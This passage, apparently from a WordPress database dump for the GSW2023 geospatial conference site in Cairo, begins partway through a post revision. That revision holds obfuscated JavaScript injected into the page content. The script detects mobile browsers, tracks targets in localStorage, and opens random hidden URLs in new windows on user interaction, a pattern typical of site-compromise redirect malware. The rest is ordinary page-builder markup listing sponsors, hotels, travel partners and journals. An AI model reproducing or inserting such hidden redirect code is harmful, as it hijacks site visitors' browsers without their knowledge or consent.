os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:28:36','2023-08-13 12:28:36','',3066,'https://gsw2023.com/?p=5113',0,'revision','',0),
(5114,1,'2023-08-13 12:29:19','2023-08-13 12:29:19','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>           Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" 